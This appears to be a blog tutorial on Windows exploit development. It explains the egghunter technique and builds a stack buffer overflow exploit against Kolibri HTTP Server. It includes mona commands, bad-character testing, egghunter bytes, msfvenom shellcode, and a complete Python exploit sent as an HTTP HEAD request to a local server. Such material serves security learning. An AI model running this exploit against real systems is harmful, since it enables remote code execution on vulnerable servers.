Windows Exploit Development: Egghunting
Hey Squad,
Hey Squad,
Hope everyone is doing great!!!
Today, we will be looking at how to exploit Kolibri HTTP Server using “Egg Hunter” method.
What is Egg Hunter?
In the normal Stack Based Buffer Overflow technique, there was as much space as we wanted to write the shellcode on the memory.
When examining an application that we suspect may be BoF, if the memory area does not have enough room for the shellcode, the shell containing the code we will send in the second part, such as ROOT or w00d, and the shellcode we sent on the memory can be loaded to a different part of the memory and given a TAG. The TAG egghunter detects it, and shellcode is run. This is the EggHunter logic.
An app that you can exploit with Stack-based BoF and Egg Hunter can look like the screenshot below on memory.
As seen in the screenshot, only 190 bytes of our shellcode could only fit. We do not have enough space.
The Solution: Egg Hunter Method
In such cases, the egg-hunter method will save lives. The egghunter shellcode we will use briefly performs the following process.
The label “w00t” is set by the code itself. The name of this label is the egg. It searches across the entirety of memory for this tag. If it does, it jumps there with the “jmp edi” instruction and executes our shellcode which is what we wanted.
Exploit Development
File: https://www.exploit-db.com/exploits/34059
Analyze the Exploit Situation
Let’s use the below script to reproduce the crash.
After looking in the Immunity Debugger, The situation is the following:
- EIP is getting overwritten.
- We have more than 500 bytes in the initial buffer that can be used to store the main shellcode
Redirect control to the stack
Find instructions to jump to stack using mona
!mona jmp -r esp
update the EIP in the exploit to the “jmp esp” instruction address accordingly.
Find bad characters
Once we are able to jump to esp, we should check for bad characters.
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
payload = A *(515 - len(badchars)) + badchars + "BBBB" + "C"*400
You will observe that the badchars = “\x00\x20\x3f”
Implement the egghunter
The targeted marker tag is “w00t”. Mona can help us create such a shellcode.
!mona egg -t b33f
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Final Exploit
Let’s use msfvenom for the shellcode.
msfvenom -p windows/exec cmd=calc.exe -b "\x00\x20\x3f" -f c
Full exploit code:
#!/usr/bin/python
import socket, os, sys
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
sc = ("\xbf\x9a\xfc\xd9\xc5\xdb\xd3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x83\xeb\xfc\x31\x7b\x0f\x03\x7b\x95\x1e\x2c\x39\x41\x5c"
"\xcf\xc2\x91\x01\x59\x27\xa0\x01\x3d\x23\x92\xb1\x35\x61\x1e"
"\x39\x1b\x92\x95\x4f\xb4\x95\x1e\xe5\xe2\x98\x9f\x56\xd6\xbb"
"\x23\xa5\x0b\x1c\x1a\x66\x5e\x5d\x5b\x9b\x93\x0f\x34\xd7\x06"
"\xa0\x31\xad\x9a\x4b\x09\x23\x9b\xa8\xd9\x42\x8a\x7e\x52\x1d"
"\x0c\x80\xb7\x15\x05\x9a\xd4\x10\xdf\x11\x2e\xee\xde\xf3\x7f"
"\x0f\x4c\x3a\xb0\xe2\x8c\x7a\x76\x1d\xfb\x72\x85\xa0\xfc\x40"
"\xf4\x7e\x88\x52\x5e\xf4\x2a\xbf\x5f\xd9\xad\x34\x53\x96\xba"
"\x13\x77\x29\x6e\x28\x83\xa2\x91\xff\x02\xf0\xb5\xdb\x4f\xa2"
"\xd4\x7a\x35\x05\xe8\x9d\x96\xfa\x4c\xd5\x3a\xee\xfc\xb4\x50"
"\xf1\x73\xc3\x16\xf1\x8b\xcc\x06\x9a\xba\x47\xc9\xdd\x42\x82"
"\xae\x12\x09\x8f\x86\xba\xd4\x45\x9b\xa6\xe6\xb3\xdf\xde\x64"
"\x36\x9f\x24\x74\x33\x9a\x61\x32\xaf\xd6\xfa\xd7\xcf\x45\xfa"
"\xfd\xb3\x08\x68\x9d\x1d\xaf\x08\x04\x62")
shellcode = "w00tw00t" + sc
payload1 = shellcode + "A"*(515-len(shellcode)) + "\xA4\x10\x3D\x77" + egghunter + "C"*100 #jmp esp 773D10A4
buffer = (
"HEAD /" + payload1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: " + "Exploit Writer" + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()
Please give me a clap if you found it to be useful and follow me to get more hacking knowledge.
You can buy me a coffee if you would like to -> https://www.buymeacoffee.com/gowthamaraj